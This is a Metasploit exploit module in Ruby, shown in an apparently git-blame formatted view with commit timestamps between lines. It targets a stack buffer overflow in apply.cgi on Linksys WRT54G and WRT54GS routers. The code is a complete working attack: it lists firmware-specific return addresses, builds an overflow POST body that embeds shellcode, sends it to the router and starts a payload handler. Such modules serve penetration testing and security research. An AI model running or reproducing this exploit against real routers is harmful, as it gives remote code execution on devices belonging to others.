2010-04-30 08:40:19 +00:00
|
|
|
##
|
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2010-04-30 08:40:19 +00:00
|
|
|
##
|
2008-09-15 18:51:45 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
require 'msf/core'
|
2008-09-15 18:51:45 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GreatRanking
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Linksys WRT54 Access Point apply.cgi Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers.
|
|
|
|
According to iDefense who discovered this vulnerability, all WRT54G versions prior to
|
|
|
|
4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
|
|
|
|
},
|
|
|
|
'Author' => [ 'Raphael Rigo <devel-metasploit[at]syscall.eu>', 'Julien Tinnes <julien[at]cr0.org>' ],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2005-2799'],
|
|
|
|
[ 'OSVDB', '19389' ],
|
|
|
|
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=305'],
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
#'BadChars' => "\x00",
|
|
|
|
'Space' => 10000,
|
|
|
|
'DisableNops' => true,
|
|
|
|
},
|
|
|
|
'Arch' => ARCH_MIPSLE,
|
|
|
|
'Platform' => 'linux',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# the middle of the intersection is our generic address
|
|
|
|
#((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16)
|
|
|
|
[ 'Generic', { 'Bufaddr' => 0x10002b50}],
|
|
|
|
[ 'Version 1.42.2', { 'Bufaddr' => 0x100016a8 }],
|
|
|
|
[ 'Version 2.02.6beta1', { 'Bufaddr' => 0x10001760 }],
|
|
|
|
[ 'Version 2.02.7_ETSI', { 'Bufaddr' => 0x10001634 }],
|
|
|
|
[ 'Version 3.03.6', { 'Bufaddr' => 0x10001830 }],
|
|
|
|
[ 'Version 4.00.7', { 'Bufaddr' => 0x10001AD8 }],
|
|
|
|
[ 'Version 4.20.06', { 'Bufaddr' => 0x10001B50 }],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Sep 13 2005',
|
|
|
|
'DefaultTarget' => 0))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RHOST('192.168.1.1')
|
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Approx size of the remaining space in the data segment after our buffer
|
|
|
|
DataSegSize = 0x4000
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
c = connect
|
|
|
|
|
|
|
|
print_status("Return address at 0x#{target['Bufaddr'].to_s(16)}")
|
|
|
|
print_status("Shellcode length: #{payload.encoded.length}")
|
|
|
|
|
|
|
|
addr = [target['Bufaddr']].pack('V')
|
2008-09-15 18:51:45 +00:00
|
|
|
|
|
|
|
# original = "Cache-Control: no-cache\r\nPragma: no-cache\r\nExpires: 0\x00\x00\x00"
|
|
|
|
# original += "\x10\xAD\x43\x00\x18\xAD\x43\x00\x70\x3e\x00\x10\x00\x00\x00\x00"
|
|
|
|
# Pointers in 2.02.6beta1
|
|
|
|
|
|
|
|
|
|
|
|
# | BIG BUFFER | Various structs and function pointers | ... | .ctors | .dtors | ... | .got |
|
|
|
|
# | <- 10000 -> | **************************** Pad with return address ***********************
|
|
|
|
# I know this is horrible :( - On the other side this is very generic :)
|
2013-08-30 21:28:54 +00:00
|
|
|
post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4)
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43"
|
2008-09-15 18:51:45 +00:00
|
|
|
|
2010-04-30 08:40:19 +00:00
|
|
|
# res = send_request_cgi({ 'uri' => "/apply.cgi",
|
2008-09-15 18:51:45 +00:00
|
|
|
# 'method' => 'POST',
|
|
|
|
# 'data' => post_data });
|
|
|
|
# print_status("Malicious request sent, do_ej should be overwritten")
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
req = c.request_cgi({ 'uri' => "/apply.cgi",
|
|
|
|
'method' => 'POST',
|
|
|
|
'data' => post_data
|
|
|
|
})
|
|
|
|
c.send_request(req)
|
|
|
|
print_status("Mayhem sent")
|
2008-09-15 18:51:45 +00:00
|
|
|
|
|
|
|
|
|
|
|
# req=c.request_cgi('uri' => '/');
|
|
|
|
# c.send_request(req);
|
|
|
|
# print_status("do_ej triggered")
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
2008-09-15 18:51:45 +00:00
|
|
|
|
2009-06-07 20:20:42 +00:00
|
|
|
end
|